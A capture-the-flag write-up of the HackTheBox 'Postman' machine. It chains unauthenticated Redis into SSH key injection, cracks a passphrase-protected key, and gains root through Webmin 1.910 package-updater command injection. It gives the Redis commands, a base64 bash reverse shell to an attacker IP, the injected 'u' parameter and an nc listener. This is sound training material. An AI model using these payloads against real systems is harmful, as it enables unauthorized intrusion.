Home Lab Setup Case 1 Case 2 Case 3 HackTheBox Vulnhub Offsec Proving Grounds

Postman (HTB – Easy)

The machine exposes a personal website, a Redis instance, and a Webmin panel. Redis is abused to gain an SSH foothold. User pivoting is done via a protected SSH key, and privilege escalation is achieved by exploiting a Webmin package update command injection.

Overview

Target: postman.htb
Initial vector: Redis → SSH key injection
Privilege escalation: Webmin 1.910 RCE via package updater

Enumeration

Nmap:

22/tcp    ssh
80/tcp    http (Apache)
6379/tcp  redis 4.0.9
10000/tcp Webmin MiniServ 1.910

Port 80 hosts a simple personal website with nothing directly exploitable. Port 6379 runs Redis without authentication.

Foothold – Redis to SSH

Follow the common Redis → SSH technique (HackTricks style): generate an SSH key locally and write the public key into ~/.ssh/authorized_keys via Redis.

Example flow:

$ ssh-keygen -t rsa -f id_rsa
$ redis-cli -h postman.htb
redis> CONFIG SET dir /var/lib/redis/.ssh
redis> CONFIG SET dbfilename "authorized_keys"
redis> SET x "ssh-rsa AAAA... your_key ..."
redis> SAVE

Then SSH in using the private key: 

$ ssh -i id_rsa redis@postman.htb

You get a low-privileged shell but cannot read the user flag yet.

User Pivot – SSH Key for Matt

Enumerate the filesystem and find an SSH private key under /opt: 

/opt/id_rsa

Copy it to your machine and crack the passphrase: 

$ ssh2john id_rsa > hash
$ john hash --wordlist=/usr/share/wordlists/rockyou.txt
-> computer2008

Use it to become Matt: 

$ ssh -i id_rsa Matt@postman.htb

Now you can read the user flag and access Webmin as Matt.

Privilege Escalation – Webmin RCE

Webmin 1.910 is running on port 10000. This version is vulnerable to command injection in the package updater (CVE‑2019‑12840 / exploit 46984).

Steps:

  1. Login to Webmin as Matt.
  2. Go to System → Software Package Updates.
  3. Turn on Burp intercept and click Update Selected Packages.
  4. Send the /package-updates/update.cgi request to Repeater.
  5. Remove existing parameters and add a malicious u parameter.

Prepare a reverse shell payload: 

$ echo -n 'bash -c "bash -i &> /dev/tcp/10.10.16.15/443 0>&1"' | base64

Use it in the u parameter: 

u=acl%2Fapt&u=$(echo${IFS}YmFzaCAtYyAiYmFzaCAtaSAmPiAvZGV2L3RjcC8xMC4xMC4xNi4xNS80NDMgMD4mMSI=|base64${IFS}-d|bash)

Listener:

$ nc -nlvp 443

Trigger the request; a root shell is returned.

Conclusion

Postman chains a classic Redis misconfiguration into SSH access, then pivots via a protected SSH key to a privileged user. Finally, a Webmin package update command injection provides root access, completing the compromise.